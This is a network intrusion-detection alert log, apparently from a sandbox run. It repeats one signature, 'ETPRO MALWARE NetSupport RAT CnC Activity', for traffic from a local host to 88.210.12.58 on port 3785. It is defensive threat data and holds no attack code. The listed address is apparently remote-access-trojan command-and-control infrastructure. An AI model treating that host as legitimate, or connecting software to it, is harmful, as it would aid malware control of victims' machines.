2024-12-10T08:58:39.706932+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.804968+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.906041+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.007002+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.107010+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.206999+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.307999+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.408011+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.508026+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.609022+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.710042+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.811048+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.914705+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.014825+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.114808+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.212971+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.314743+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.414002+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.514758+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.618734+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.714987+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.816699+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.915975+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.017009+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.117993+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.219019+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.319976+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.419982+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.519998+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.621015+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.721025+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.824695+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.924700+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.024702+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.124696+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.224001+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.324702+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.428703+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.524992+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.628698+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.728716+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.826996+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.926995+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.028038+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.128002+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.228017+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.328991+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.429085+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.529997+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.631067+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.732016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.833890+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.934814+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.035697+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.133976+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.234968+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.335976+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.438747+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.536980+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.637987+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.738003+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.839043+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.940007+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.044663+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.145015+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.245004+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.345993+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.445985+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.547034+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.648011+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.747984+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.852698+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:46.952030+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.050697+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.152702+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.251003+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.551683+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.551683+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.551683+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.656715+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.752707+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.851996+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:47.953107+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:48.052998+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:48.154056+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:48.861957+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:48.861957+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.063379+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.163077+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.264707+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.364701+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.466714+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.566730+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.666717+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.766741+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.863979+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:49.965006+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.064998+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.166013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.266032+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.365976+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.467018+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.568016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.668997+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.770056+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.870983+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:50.972745+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.071979+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.172700+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.328865+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.328865+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.756709+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.756709+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:51.954009+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.054097+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.154990+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.255978+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.356015+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.455983+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.555993+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.656991+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.757995+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.862758+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:52.963180+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.060979+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.162867+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.263012+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.363995+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.464712+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.564988+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.666870+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.764988+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.864983+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:53.965010+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.066048+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.167097+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.268015+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.368139+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.468132+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.569002+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.670006+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.770006+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.871877+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:54.971642+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.072718+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.176566+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.274788+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.373991+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.474757+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.574975+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.674972+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.776708+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.876148+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:55.977042+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.299115+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.299115+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.546130+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.757984+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.858538+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:56.958749+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.057991+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.158794+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.258981+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.359038+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.463720+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.562825+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.662780+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.762796+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.862007+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:57.963021+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.064010+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.164098+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.264034+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.364997+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.466042+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.565973+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.667049+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:58.767199+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.090549+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.090549+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.296711+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.413955+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.517208+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.617072+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.717035+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.819761+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:59.918069+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.018996+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.119082+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.220022+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.320994+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.421016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.521005+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.621001+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.721013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.822085+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:00.924714+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
